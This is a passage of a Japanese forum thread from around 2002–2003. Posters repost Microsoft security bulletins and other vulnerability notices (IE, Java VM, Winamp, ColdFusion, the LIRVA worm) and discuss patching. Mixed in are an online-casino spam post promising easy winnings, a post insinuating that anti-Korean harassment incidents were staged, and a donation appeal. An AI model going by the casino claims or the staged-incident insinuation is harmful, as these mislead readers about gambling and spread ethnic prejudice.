展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。
脆弱性識別番号 : CVE-CAN-2002-1262
テストしたバージョン :
マイクロソフトは Internet Explorer バージョン 5.5 および 6 のテストを
行い、この脆弱性による影響を評価しました。Internet Explorer 5.01 は
この脆弱性の影響を受けません。
Windows Operating System Components Lifecycles に関する詳しい情報は
http://microsoft.com/windows/lifecycle/desktop/consumer/components.mspx (英語情報) をご覧ください。
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
http://www.microsoft.com/windows/ie/downloads/critical/q324929/default.asp ダウンロード先のリストから [Japanese] を選択してください。
注意: 2002/12/07 の更新による修正プログラムの変更はありません。
既に適用されているお客様は、再適用の必要はありません。
修正プログラムに関する追加情報 :
対象プラットフォーム :
・Internet Explorer 5.5 用の累積的な修正プログラムは
Internet Explorer 5.5 Service Pack 2 を実行しているシステムに
インストールすることができます。
・Internet Explorer 6 用の累積的な修正プログラムは
Internet Explorer 6 または Internet Explorer 6 Service Pack 1 を
実行しているシステムにインストールすることができます。64 bit 版
Internet Explorer 6 をお使いのお客様は、Internet Explorer 6
Service Pack 1 にアップグレードしてから本修正プログラムを
適用してください。
再起動の必要性 : あり 修正プログラムのアンインストール : 不可 修正プログラムに含まれる過去の修正 : この累積的な修正プログラムは、マイクロソフト セキュリティ情報 MS02-066 で提供された累積的な修正プログラムを含みます。 修正プログラムが正しくインストールされたかどうか確認する方法 : この修正プログラムがマシンにインストールされたことを確認するためには、 Internet Explorer を起動し、[ヘルプ] を選択します。Internet Explorer の [バージョン情報] で [更新バージョン] のフィールドに Q324929 が表示 されていることを確認して下さい。 各ファイルを確認するためには、サポート技術情報 Q324929 の 修正プログラム欄を参照して下さい。 警告 : なし
841 :
◆kc/....... :02/12/08 01:51 ID:/XU/ySU0
せきゅりてぃーかよっ!!
保守
Microsoft VMにまたかなりやばいセキュリティホールが見つかった模様です。
Microsoft Windowsを使用しているすべてのユーザはWindowsUpdateから
修正プログラムを入手することを推奨します。
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-069.asp ----------------------------------------------------------------
Microsoft VM の問題により、システムが侵害される (810030) (MS02-069)
登録日 : 2002/12/12 更新日 : 2002/12/12
概要 :
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) を使用しているお客様
脆弱性の影響 : 8 つの脆弱性。最も深刻な脆弱性については、攻撃者が別の
ユーザーのシステムの制御を取得する可能性があります。
最大深刻度 : 緊急
推奨する対応策 :下記に説明されているように、お客様は Microsoft VM ビルド
3809 またはそれ以降のビルドをインストールして下さい。
影響を受けるソフトウェア :
・Microsoft 仮想マシン (Microsoft VM) のバージョンはビルド番号により識別
されます。ビルド番号は 「よく寄せられる質問」 で説明されているように
JVIEW ツールを使用して確認することができます。5.0.3805 までの
Microsoft VM の すべてのビルド (5.0.3805 を含む) はこれらの脆弱性の影響
を受けます。(「よく寄せられる質問」 の日本語情報は現在準備中です。Jview
の使用方法は、概要情報にてご案内していますので、こちらをご覧ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-069ov.asp )
問題 :技術的な説明 : Microsoft VM は Win32(R) 運用環境のための仮想マシンです。Microsoft VM は Internet Explorer のほとんどのバージョンに同梱されています。また、 Windows のほとんどのバージョンにも同梱されています。(これらのバージョン の一覧は 「よく寄せられる質問」 をご覧下さい。) Microsoft VM の新しいバージョンが利用可能となり、新たに報告された 8 つの セキュリティ問題に対する修正プログラムおよび以前リリースされたすべての VM 用の修正プログラムを含みます。すべての新しい問題に関する攻撃方法は 同一である可能性があります。攻撃者は開かれると任意の脆弱性を悪用する Web ページを作成し、それを Web サイトにホストする、または HTML 形式の電子 メールとしてユーザーに送る可能性があります。 新しく報告されたセキュリティ問題は次の通りです。(略) 問題を緩和する要素 :(略) 深刻度 : COM オブジェクト アクセスの脆弱性 緊急 CODEBASE 偽装の脆弱性 重要 ドメイン偽装の脆弱性 警告 JDBC API の脆弱性 警告 Standard Security Manager アクセスの脆弱性 注意 User.dir 公開の脆弱性 注意 不完全な Java オブジェクトのインスタンス作成の脆弱性 注意 上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な 展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。 脆弱性識別番号 : (略)
テストしたバージョン :
マイクロソフトは VM ビルド 5.0.3167 のテストを行い、この脆弱性による影響
を評価しました。それ以前のバージョンに関してはサポートの対象となって
いないため、この脆弱性による影響は不明です。
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
既存の Microsoft VM を更新するこの修正プログラムは Windows Update で利用
可能です。
http://windowsupdate.microsoft.com/ 注 : ダウンロードし、ネットワークを経由して適用できるバージョンの修正
プログラムが利用可能です。この修正プログラムの入手方法は
「よく寄せられる質問」 をご覧下さい。(「よく寄せられる質問」 の日本語
情報は現在準備中です。準備ができるまでの間、英語情報をご覧ください。
http://www.microsoft.com/technet/security/bulletin/ms02-069.asp )
修正プログラムに関する追加情報 :
対象プラットフォーム :
Microsoft VM を更新する新しい VM のビルドは次の Windows のバージョンに
インストールすることができます。
・Microsoft Windows 95
・Microsoft Windows 98 および 98SE
・Microsoft Windows Millennium
・Service Pack 1 以降の Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP
この修正を含む予定のサービス パック : このビルドに含まれる修正はすべての将来の VM のビルドに含まれる予定です。 再起動の必要性 : あり 修正プログラムのアンインストール : 不可 修正プログラムに含まれる過去の修正 : 新しい VM のビルドは 5.0.3805 およびそれ以前のすべてのビルドに取って 代わるものです。新しいビルドは次のマイクロソフト セキュリティ情報で 説明されたすべての問題に対する修正プログラムを含みます。 ・マイクロソフト セキュリティ情報 MS99-031 MS99-045 MS00-011 MS00-059 MS00-075 MS00-081 MS02-013 MS02-052 修正プログラムが正しくインストールされたかどうか確認する方法 : マイクロソフト サポート技術情報 810030 に修正プログラムが正しく インストールされたかどうかを確認するための情報が記載されています。日本語 版修正プログラムの情報は、現在準備中です。 注 : JVIEW から表示されるバージョン番号に関わらず、上記のマイクロソフト サポート技術情報で説明されているレジストリ キーはこの修正プログラムの 正しいインストールに関する要素を確認します。
849 :
窓板住人 :02/12/12 22:23 ID:9WM3ZVIi
警告 :なし
他のセキュリティ問題を解決する修正プログラムは以下のサイトから入手
できます。
・セキュリティ修正プログラムはマイクロソフト ダウンロード センターから
ダウンロードすることができます。「security_patch」 のキーワード探索に
よって容易に見つけることができます。
・コンシューマー プラットフォーム用の修正プログラムは、WindowsUpdate Web
サイトからダウンロードできます。
詳細情報 :
・US マイクロソフトセキュリティ情報(MS02-069)
http://www.microsoft.com/technet/security/bulletin/ms02-069.asp 更新履歴 :
・2002/12/12: このセキュリティ情報ページを公開しました。
SMB 署名の問題により、グループ ポリシーが変更される (309376) (MS02-070)
登録日 : 2002/12/12 更新日 : 2002/12/12
概要 :
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) XP または Windows 2000 を使用している
システム管理者。特に Windows 2000 に関しては、ドメイン コントローラ
として使用している場合
脆弱性の影響 : グループ ポリシーの変更
最大深刻度 : 警告
推奨する対応策 : Windows 2000 または Windows XP システムを SMB 署名を
使用するように構成している管理者は直ちに修正プログラムをインストール
してください。
影響を受けるソフトウェア :
・Microsoft Windows 2000
・Microsoft Windows XP
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-070.asp ----------------------------------------------------------------
問題 :技術的な説明 : (略)
問題を緩和する要素 : (略)
修正プログラムに関する追加情報 : 対象プラットフォーム :
・Windows 2000 用の修正プログラムは Windows 2000 Service Pack 2 または
Service Pack 3 を実行しているシステムにインストールすることができます。
・Windows XP 用の修正プログラムは Windows XP を実行しているシステムに
インストールすることができます。
この修正を含む予定のサービス パック :
・この修正プログラムは Windows 2000 Service Pack 4 に含まれる予定です。
・この修正プログラムは Windows XP Service Pack 1 に既に含まれています。
再起動の必要性 : あり
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 :
この修正プログラムがマシンにインストールされたことを確認するためには、
マシンに次のレジストリ キーが作成されたことを確認して下さい。
・Windows 2000:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q309376
各ファイルを確認するためには、次のレジストリ キーで、日付、時間そして
バージョン情報を参照して下さい。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q309376\Filelist
・Windows XP:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP1\Q309376
各ファイルを確認するためには、次のレジストリ キーで、日付、時間そして
バージョン情報を参照して下さい。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP1\Q309376\Filelist
更新履歴 : 2002/12/12: このセキュリティ情報ページを公開しました。
詳細情報 :
・US マイクロソフトセキュリティ情報(MS02-070)
http://www.microsoft.com/technet/security/bulletin/ms02-070.asp
>>851 の32ビットと64ビットの違いがわかりません。
自分のXPがどっちなのか知る方法を教えてくだつぁい。
>>853 その事すら分からない貴方なら32ビットでしょう。
>>853 殆どの場合32ビットだけど・・・
いま2000でやってみたらWindowsUpdateにちゃんとあるから
WindowsUpdateから適用した方が安心かと
858 :
853 :02/12/13 22:49 ID:???
レスありがと WindowsUpdateで出てこないので どうやら自分のPCには関係ないようです
XPならSP1が当っていれば問題無いだろう。
860 :
名無しさん@お腹いっぱい。 :02/12/14 08:24 ID:hLuARL+d
>>859 うちもXP+SP1だけどWindows Updateに出てきたよ?
>>858 windowsUpDateをUpDateしる!
862 :
名無しさん@お腹いっぱい。 :02/12/14 19:46 ID:PXRyYgIq
あのう昔気になったんですがパソコンが盗まれて警察がみつけたことがあった らしいんですがそれはパソコン内の製造番号とかを外部(警察)が調べたという ことですか?つまりそれらは外部からでもわかっちゃうものなんですか? ちなみにそれらはどこにはいってるんですか?HD?メモリー?マザー? 長くてすみません でも長い間気になっていたことなんでどうか教えてください。
>862 アンタ板違いだって。
25歳。
去年まで金無し君だったけど、オンラインカジノとパチンコで
二年で350万貯めた。一度やってみなよ。
初回のみだけど、1ドル以上のチップを買えば30ドル(4000円くらい)貰える。
もらうだけもらってプレイせずに換金することもできるし、ルーレットで赤か黒に
思い切って賭けてしまえば50パーセントで二倍になる。
金なきゃオフラインでゲームすればいいだけ。暇つぶしになる。
ビデオポーカーとかスロとか色々あるのでマジでお勧め。
http://www.imperialcasino.com/~1kl5/japanese/
865 :
862 :02/12/15 15:12 ID:YGXMam6k
>>863 はう。。。
そうだったんですかではどこの板いけばいいですか?
867 :
名無しさん@お腹いっぱい。 :02/12/15 15:34 ID:uPeq7ETa
Windows WM_TIMER メッセージ処理の問題により、権限が昇格する (328310)
(MS02-071)
登録日 : 2002/12/12 更新日 : 2002/12/12
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-071.asp ----------------------------------------------------------------
概要 :このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) NT 4.0、Windows 2000 および Windows XP
を使用しているお客様
脆弱性の影響 : 権限の昇格
最大深刻度 : 重要
推奨する対応策 : お客様はできる限り早期にこの修正プログラムを
適用して下さい。
影響を受けるソフトウェア :
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
問題 : 技術的な説明 : (略) この脆弱性により、メッセージを出したプロセスはその高い権限で処理を実行 することができます。 (略) この修正プログラムはこの脆弱性を解決するだけでなく、対話的なデスクトップ を持つ、高い権限で実行されるいくつかのプロセスに変更を行います。これらの すべてのプロセスには WM_TIMER の脆弱性が存在せず、攻撃者によりシステムで 権限を取得されることはありませんが、マイクロソフトはサービスをさらに 強固にするために修正プログラムにこれらの変更を含めました。 問題を緩和する要素 : (略) 深刻度 : 製品 Windows NT 4.0 重要 Windows NT 4.0, Terminal Server Edition 重要 Windows 2000 重要 Windows XP 重要 上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な 展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。 脆弱性識別番号 : CAN-2002-1230 テストしたバージョン : Windows NT 4.0、Windows NT 4.0、Terminal Server Edition、Windows 2000 および Windows XP。 それ以前のバージョンに関してはサポートの対象となっていないため、 この脆弱性による影響は不明です。
修正プログラムに関する追加情報 :
対象プラットフォーム :
・Windows NT 4.0 用の修正プログラムは、Service Pack 6a を実行している
システムにインストールすることができます。
・Windows NT 4.0 Terminal Server Edition 用の修正プログラムは、
Windows NT 4.0, Terminal Server Edition Service Pack 6 を実行している
システムにインストールすることができます。
・Windows 2000 用の修正プログラムは、Service Pack 1、Service Pack 2
または Service Pack 3 を実行しているシステムにインストールすることが
できます。
・Windows XP 用の修正プログラムは、Windows XP または Service Pack 1 を
実行しているシステムにインストールすることができます。
この修正を含む予定のサービス パック :
この問題に対する修正プログラムは Windows 2000 Service Pack 4 および
Windows XP Service Pack 2 に含まれる予定です。
再起動の必要性 : あり
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 :(略)
警告 :なし
詳細情報 :
・US マイクロソフトセキュリティ情報(MS02-071)
http://www.microsoft.com/technet/security/bulletin/ms02-071.asp 更新履歴 :・2002/12/12: このセキュリティ情報ページを公開しました。
872 :
IEは危ない :02/12/16 13:32 ID:3phAxh0W
ウインドーズについてくるIEではユーザーが行ったサイトの情報がCookiesフオルダーの中にあるINDEXに記入されるようになっている(クッキーそのもの以外に)。そしてINDEXの内容を変更するとIEが動かなくなってしまうようにできている。 これはプライバシーや個人情報の点で非常に危険。 はやく、Mozilla や Netscape 等の別のブラウザーを使うようにしたほうがいい。
873 :
名無しさん@お腹いっぱい。 :02/12/16 14:01 ID:5XnoVsfP
お尋ね申します。 パソコンが変です。きちんと電源を落としたのに、 次に使う時、立ち上がりません。 IBMですが、「スタンバイ」のランプは付いているのですが・・ そして、夜中に、急にパスワードの画面が出るのです。 これって、何かのウイルスなのでしょうか?
874 :
名無しさん@お腹いっぱい。 :02/12/16 14:03 ID:0wB26P0R
>>872 MozillaやNetscapeではCookieを利用してパソコン内のファイル一覧が表示されるバグとか多かったよね。
ブラウザを選ぶのではなく、CookieとJavaは使わないようにしよう。
4日ほど多忙留守ですた。窓板住人氏、乙様です。 今470KBなので900ぐらいまで行ったら新スレですかね。
もうそんな大きくなったか。 全て丸写しする必要ないかもしれませんね。 概要と説明へのリンクとファイルの直リンで十分かと。 そっちの方がめんどくさいかな? でも著作権的にも丸写しってのはまずいだろうしね。
>>876 実はさ、MSからは、全文引用のみ可、部分引用、要約翻案禁止って
言われてるんだよね(^^;
何じゃそら、ワロタ
880 :
サイトマニア :02/12/16 20:22 ID:Mljg6YWb
882 :
名無しさん@お腹いっぱい。 :02/12/17 23:25 ID:sXibjpLi
>>882 要するに、Macromedia Flash playerのVer.6.0.65.0を
入れれば良いってこと?
888 :
名無しさん@お腹いっぱい。 :02/12/19 12:40 ID:MGfYIhAh
age
890 :
210.239.43.212.in-addr.arpa :02/12/19 19:12 ID:H4uyRyiT
regst
894 :
名無しさん@お腹いっぱい。 :02/12/20 03:21 ID:mhKisRS+
はぁ
>>896-897 そういっていただけると(^o^)
場所はPCニュース板としての価値を維持するために
ここでいいんじゃないかと(^^;
あ、あと、前スレのリンクお忘れ無く(俺が忘れてた(^^;)
板のためのスレ
>窓板住人さん 乙。うまくテンプレまとまってますね。 >むむむ ◆MUMUMUkopk さん いつもお疲れさんです。
902 :
これは? :02/12/21 21:56 ID:kn1BbrEF
905 :
名無しさん@お腹いっぱい。 :02/12/22 00:18 ID:yOZgI0EG
・チマチョゴリ切り裂き事件 犯人が速攻で取り押さえられても不思議ではない事件。犯人は? そもそも衣服が切られたのに怪我人がいない。 ルパンの石川五右衛門ですか? ・嫌がらせ事件 逮捕者に日本人がいないそうです、何故でしょう? ・落書き事件 朝鮮総連に「めぐみさんを反せ」と落書きされた ハングルでは反と返は同じ表現ですが関係あるのでしょうか? ・朝鮮総連放火事件 なぜかタオル1枚が燃え尽きる前にお偉いさんが見つけました、 通行人は110に通報しました。 火が付いてから5分で発見したそうなのですが、何故5分と解るのでしょうか? しかも、「善良な日本人」を名乗る犯行声明がありました。
結構前だけど
http://www.foundstone.com/knowledge/randd-advisories.html Multiple Exploitable Buffer Overflows in Winamp
One buffer overflow exists in Winamp 2.81 (latest 2.x release) and
two buffer overflows exist in Winamp 3.0 (latest 3.x release).
Winamp 2.81 および 3.0 に buffer overflow する弱点。
MP3 ファイルの ID3v2 タグ (Winamp 2.81: Artist フィールド、
Winamp 3.0: Artist および Album フィールド) の取りあつかいで
buffer overflow するため、Winamp 2.81 はクラッシュ、Winamp 3.0 では
任意のコードの実行が可能。 (セキュリティホールmemoより抜粋)
だそうで、
http://www.winamp.com/news.jhtml?articleid=9680 によれば
If you haven't downloaded Winamp since 12-17-2002
then you are vulnerable to the security exploit.
2.81だろうが3.0だろうがとにかく最新のをダウンロードすれば良いらしいです。
>>906 某memo MLで話題になってたやつですね。
バージョン等を変えずにファイルだけ差し替えたみたいです。
908 :
むむむ ◆MUMUMUkopk :02/12/24 11:53 ID:0Lvjy+9m
909 :
名無しさん@お腹いっぱい。 :02/12/29 19:47 ID:HmFwaMNP
保守
910 :
名無しさん@お腹いっぱい。 :02/12/29 23:00 ID:JcZqEPE3
もう、 windowsなんて つかわないから かんけいないもーん。
あっそ
912 :
名無しさん@お腹いっぱい。 :02/12/31 17:59 ID:uP6QWOMK
むむむさん、窓板住人さん、名無しさん多数… あけましておめでとうございます
914 :
名無しさん@お腹いっぱい。 :03/01/02 07:08 ID:JqDZ6Vem
保守
915 :
名無しさん@お腹いっぱい。 :03/01/02 23:30 ID:arAsotse
916 :
名無しさん@お腹いっぱい。 :03/01/02 23:31 ID:arAsotse
システム要件 サポートされているオペレーティング システム : Windows 2000, Windows 98, Windows ME, Windows NT, Windows XP Microsoft Windows 98 (Y2K Update 2 が必要) および Internet Explorer 4.01 Service Pack 2 (SP2) 以降 Microsoft Windows 98 Second Edition Microsoft Windows Millennium Microsoft Windows NTR 4 Service Pack 5 (以上) および Internet Explorer 4.01 SP2 以降 Microsoft Windows 2000 Microsoft Windows XP
というか、明けましておめでとうございますだった(笑)
この板、なにげにチェックしていますが、けっこうお世話になってます。 ところで、むむむさんに質問です。 トリップは偶然MUMUMUとなったのですか、それとも自分の好きなのを出す裏技があるのでしょうか? よろしかったら教えてください。
921 :
919 :03/01/05 15:50 ID:???
>>窓板住人さん いえいえ、ありがとうございます。 早速ダウンロードさせていただきました。
922 :
915 :03/01/05 23:14 ID:uxuxlJDs
MDAC2.7のmsxml3.dllのバージョンがMS02-008のそれより古い問題がありましたが sp1では解決されてます。 よって、MDAC2.7sp1をインストールすれば MS02-008をその後にインストール必要はないようです。 気になったので調べてみました。
>>922 おおおおお、それはもの凄い良い話でイイ情報だ!THX!
924 :
山崎渉 :03/01/06 01:58 ID:???
(^^)
>>850 最近シャットダウンにやたら時間かかると思ったらこれが原因だったか。
アンインスコしたらスムーズに終了できるようになった。
個人使用のPCならあんまり意味無いから削除した方がいい。
926 :
名無しさん@お腹いっぱい。 :03/01/06 10:58 ID:vW7YJAeD
保守
927 :
名無しさん@お腹いっぱい。 :03/01/06 11:41 ID:StxhOpi/
l;:
929 :
窓板住人 :03/01/07 15:54 ID:rN7Ja3Bt
930 :
名無しさん@お腹いっぱい。 :03/01/07 17:46 ID:cfjBnhmZ
Yaha.Kに関する情報は無いですか??
あぼーん
【新事実】愛生会病院のWeb site作者は有名クリエーター
http://pc.2ch.net/test/read.cgi/sec/1017309416/l50 匿名掲示板で話題になった愛生会病院(埼玉県久喜市:宮本弘毅院長)
のサイトだが、実は有名なWebクリエーターの作品であることが4日、分かった。
このサイトを作成したのはTVタイトル、ロゴ等何でもこなす、埼玉県在住のF氏。
デザインのみならず企画力も抜群で、今回のコンセプトは、とにかくWeb作成上の
禁じ手を可能な限り詰め込むこととした。
実際に愛生会のサイトへアクセスすると、「太陽にほえろ」の軽快なBGMの流れる中、
黒背景に原色を多用した文字配列、どぎついまでのアニメーションGIFなど、見る側に
かなりのインパクトを与えることは間違いない。
F氏は、既成の病院のイメージを打ち崩し、みんなの心に残るサイトを創りたかったと話す。
その言葉を反映するかのように、アクセス件数は一日数万件を数え、病院のサイトでは
間違いなくアクセス件数No.1だろう。(日系ウエブデザイン)
■複数の感染経路を持つ「最強最悪」のウイルス「LIRVA」
トレンドマイクロは8日、メール、ICQ、LAN、ファイル共有ソフトなど複数の感染経路を
持つ“最強最悪”のウイルス「WORM_LIRVA.A」を警告した。1月8日18時の段階で日本
での感染報告はないものの、フランスでは10件の感染が報告されている。現在のところ
危険度「低」だが、感染力の高さから予断を許さない状況だ。
「WORM_LIRVA.A」は、1月7日に発見されたトロイの木馬型ウイルスで、複数の感染
経路や破壊活動等を行なう。主な活動を挙げると、「自分自身のコピーを作成」、
「独自のSMTPによる自分自身の大量送信」、「ネットワークドライブへの感染」、
「パスワード漏えい」、「アンチウイルスソフトの停止」などとなっている。
(以上、2003年1月8日のBroadband Watchより一部引用―全文は引用元を参照)
引用元:
http://bb.watch.impress.co.jp/cda/news/432.html
935 :
窓板住人 :03/01/10 15:42 ID:fZOFsqKV
MPSB03-01 - Patch available for ColdFusion MX Enterprise Edition
sandbox security issue that allows templates to include arbitrary files
http://www.macromedia.com/v1/handlers/index.cfm?ID=23638 Macromedia Cold Fusion MXに弱点。
<cfinclude>タグと<cfmodule>タグにおいて、相対パスでファイル名を指定することが出来るが、
SandBoxSecurity Files/Dirs permissionsの指定で本来は指定を制限できるのに機能していない?
ということらしいです。パッチ当ててください。
一応、Windowsで動くしセキュリティがらみということで。
Windowsで動作するWWWサーバ、an httpdがバージョンアップしてます。
Version 1.42e では、特定のURIでクロスサイトスクリプティングが発生する
セキュリティバグに対処しました。また、デバイス名チェックを強化しました。
(2003/1/8)
Version 1.42f では、1.42e で CGIが正常に動作しないバグを修正しました。
(2003/1/9)
新しいバージョンは公式サイトからダウンロードしてください。
http://www.st.rim.or.jp/~nakata/
938 :
窓板住人 :03/01/14 21:13 ID:VPWXHMzL
あぼーん
940 :
窓板住人 :03/01/15 04:37 ID:9loGVVQz
OpenTypeフォントファイルがWindows 2000とXPをクラッシュ
http://headlines.yahoo.co.jp/hl?a=20030108-00000016-vgb-sci アイ・ディフェンス・ジャパンからの情報によると、マイクロソフト社の
Windowsフォントローダーで、サービス拒否(DoS)攻撃の脆弱性が
発見された。
この欠陥をローカル攻撃することで、システムがクラッシュする。
Windows 2000およびXPでは、即時に青一色のエラー画面
(ブルースクリーン)が表示される(以降略)
ご注意下さい。IEとかにはフォントをロードする機能もあったはずですし。
(これに関する影響は不明ですが)
941 :
山崎渉 :03/01/15 12:14 ID:???
(^^)
>>943 Windows板で既出で、そのパッチ当てるとシャットダウンが遅くなると言う事象も
これまた既出だけど、それはセキュリティとはあまり関係ないような・・・
つまり、マイクソは糞という訳で
946 :
山崎渉 :03/01/16 06:29 ID:???
(^^)
948 :
名無しさん@お腹いっぱい。 :03/01/16 17:54 ID:W3fs+2Tq
保守
949 :
窓板住人 ◆winDOwS0aE :03/01/17 22:23 ID:3Jhh5d5I
マイクロソフト サポート技術情報 - 331663
Windows Update Web サイトおよび自動更新機能により MS02-052 ではなく
MS02-013 のインストールを求めるプロンプトが表示される
http://support.microsoft.com/default.aspx?scid=kb;ja;331663 よくわからないのですが、MS02-013を適用後、SunのJREをインストールすると、
MicrosoftVMのレジストリ値が書き換えられるためにMS02-013が未適用と識別され、
本来適用しないとまずいMS02-053がWindows Updateのリストや自動更新に含まれない
という問題があるようです。。。一応セキュリティホールがらみなので、念のため。
■各社のJava VMに砂場の枠が外れる脆弱性
jbeef曰く、"11月25日にBUGTRAQに流れた記事によると、ポーランドのグループが、
Netscape、Microsoft、SunのそれぞれのJava VMに、 bytecode verifierのチェック
漏れやJITコンパイラのバグなどが原因のセキュリティホールを発見したという。
Netscape 4.0〜4.8(Windows, Unix版)と Internet Explorer 4.0〜6.0では、 sandbox
セキュリティ制約が崩れ、その結果、ローカルファイルの読み出しや、任意コマンドの
ローカル実行などの脅威がもたらされる。 Netscape 4.xでは、JDBC関連のシステム
クラスの実装ミスもあり、合わせ技によって、任意のネイティブコードの実行もできて
しまうという。
(以上、2003年1月20日のSlashdot Japanより一部引用―全文は引用元を参照)
引用元:
http://slashdot.jp/article.pl?sid=03/01/19/107215&topic=43
951 :
窓板住人 ◆winDOwS0aE :03/01/20 03:59 ID:tKHjC5kf
952 :
名無しさん@お腹いっぱい。 :03/01/20 05:25 ID:2lw8fjSO
Javaはきってる
あぼーん
あぼーん
955 :
窓板住人 ◆winDOwS0aE :03/01/20 10:57 ID:tKHjC5kf
★IEのXSSバグで任意サイトのCookieが漏洩
jbeef曰く、"現時点でIEはcookieを盗まれ得るブラウザである。
cookieを盗まれると致命傷となるサイトの利用には注意が必要だ。
12月に2つのcookieが漏洩する脆弱性が報告されたが、まだパッチが出ていない。
1つ目の脆弱性は、JScriptの「showModalDialog()」メソッドにあり、
任意のWebサイトのcookieが盗まれ得る。
2つ目の脆弱性は、ウィンドウで直接「.swf」などのファイルを開く機能にある。
IEは、フラッシュなどのファイルを直接開くとき、それを貼り付けたHTMLを
内部的に生成しているのだという。
このHTMLの生成過程に、クロスサイトスクリプティング(XSS)脆弱性がある・・・(略)
詳しくは引用先Slashdot Japanをご覧下さい
http://slashdot.jp/security/03/01/18/1226227.shtml?topic=41 XSSの問題は非常にアレゲな感じ。Flash作者なら簡単にできそう。
しばらくは安易にFlashは見れなくなりそう。
おまんこ
>949 >950の件でJ2RE1.4.1_01を入れたのですが、 レジストリに書き込まれているバージョンは確かに3802になりましたが、 WindowsUpdateでJavaVMのインストール要求は出ませんでした。 Win95OSR2+IE5.5SP2 JREインストール前のバージョン : 3809 以上、参考まで。
959 :
名無しさん@お腹いっぱい。 :03/01/21 14:33 ID:5YtnqncI
新スレは?
>>959 むむむさん忙しそうだから建てちゃおうかな。
レス数が950を超えています。1000を超えると表示できなくなるよ。 サイズが496KBを超えています。512KBを超えると表示できなくなるよ。 これが、2つ同時に表示されるの初めて見た・・・
>964 新しいスレには、どうでもいい事を書かないように頼むよ
>>964 数回見たことあるけどなぁ
>>965 まぁまぁ、マターリ行きましょ
といいつつ埋めてみる
968 :
麻 :
03/02/06 20:13 ID:v2oAQibi 二神一族の研究については、本格的な調査解明はこれから、10年、20年単位の研究になると思います。2000年NHKのビデオシリーズ 歴史を学ぶ 1 『海で結ばれた世界〜瀬戸内海・二神島〜』 『海の民の歴史〜二神家の歴史を通して〜』 『発掘調査の実験〜二神家墓地遺跡発掘現場にて〜』 など注目されましたが、もうひとつの二神の歴史を独自に調べようと思います。 二神一族の新しい歴史調査を独自にしたいと思っているのですが、資金面で問題がある為、寄付お願いします。 二神 麻奈美(ふたがみ まなみ)池田銀行名塩支店普通1623881